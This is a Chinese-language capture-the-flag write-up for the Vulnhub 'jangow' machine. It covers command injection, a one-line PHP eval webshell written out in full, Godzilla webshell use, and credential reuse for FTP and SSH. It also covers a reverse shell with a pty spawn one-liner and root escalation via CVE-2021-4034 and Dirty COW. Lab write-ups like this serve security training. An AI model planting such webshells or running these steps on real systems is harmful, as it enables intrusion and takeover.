Vulnhub之jangow打靶思路
2022-11-6 11:0:25 Author: 藏剑安全(查看原文) 阅读量:13 收藏

1.  打靶思路总结

信息收集-命令执行-getshell-FTP登陆-不出网反弹shell-ptyshell-SSH登陆-dirtycow提权,最终拿到root权限,获取Flag。

* 攻击机:Kali,本机
* 目标靶机:jangow

2. 信息收集

靶机IP:192.168.56.118,Nmap进行端口扫描,靶机开放80以及21FTP端口,尝试FTP弱口令是否能登陆,经测试,anoymous/anoymous弱口令不存在。随后访问80端口,web站点出现,PHP站点+Apache中间件。

尝试进行目录扫描:只发现了静态资源文件夹尝试访问其它界面:http://192.168.56.118/site/busque.php?buscar=

bp进行不断Fuzz,命令执行漏洞X1

3.一句话木马Getshell

既然存在命令执行,尝试使用PHP反弹shell试试,PHP反弹shell失败,怀疑不出网

查看系统有无python,使用python反弹shell,nc没反应,大概率就是不出网

随后转变思路,尝试echo一句话进去,哥斯拉生成php马

echo '<?php eval($_POST["ace"]);' > ace.php

木马成功写入,使用哥斯拉连接,随后查看站点目录有无可用信息等,发现数据库连接信息,但是数据库服务未开启,但站点开启了21FTP端口,尝试此账号密码登陆失败。

继续找别的敏感信息,随后再整站目录下发现另外一个数据库连接账号密码的备份文件。

继续尝试用账号密码进行FTP登陆,提示登陆成功随后cd到不同的目录中,查找文件,由于当前为www权限,进入目录很多无权限。进入到home目录下,发现关键信息jangow01文件夹下存放了user.txt,使用FTP命令下载到本地打开第一个Flag已拿到:d41d8cd98f00b204e9800998ecf8427e

4.反弹Shell

哥斯拉的中有不出网反弹shell的模块:RealCmd,填好参数后,尝试进行shell反弹

本地nc监听4444即可:反弹成功,但是此时反弹回来的shell很多命令都没办法使用,比如top,vim,sudo等如果此时目标主机存在python环境的话,我们可以尝试使用ptyshell可以实现简单的tty。

whereis python查看有无python环境,信息收集的时候我们已经得知,靶机有python3环境,于是直接运行:

python3 -c 'import pty; pty.spawn("/bin/bash")'

然后就可以尝试各种命令了,再查看端口的时候,发现开放了22SSH端口:

如果可以SSH登陆进去,那就很方便了。

尝试SSH登陆,使用刚刚的FTP账号密码进行尝试。吼,登陆成功

5.提权(1)

目前针对这台主机已经拿下webshell,FTP账号密码,SSH账号密码,但是shell权限是www,无法查看root下的文件,那就提权。

uname -a 得知是ubuntu 4.4.0,,Kali直接:searchspolit 4.4.0也可直接百度搜索ubuntu 4.4.0提权等等,在此我使用的是脏牛或者CVE-2021-4034

首先查看目标主机是否安装gcc随后上传CVE-2021-4034到/tmp临时目录下,使用FTP上传或者哥斯拉上传都可以。随后进入到tmp目录下,随后编译此文件编译成功后会在当前目录生成exp文件

随后./exp进行提权操作,成功提升至root权限!进入root目录下查看文件读取proof.txt,第二个Flag拿到

6.提权(2)

继续使用脏牛提权

原理同上,上传至tmp目录下,随后进行编译编译成功:

进行提权:

然后系统死机了???

打靶结束!


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDA5NzUzNA==&mid=2247484688&idx=1&sn=3e1380bb41d4a16fded07a2eaf8fe9e9&chksm=cfe09f01f897161798ebf607fb6eced5eea7c323e9d72b6d9a3e78d7700c5348be0f7b0202d9#rd
如有侵权请联系:admin#unsafe.sh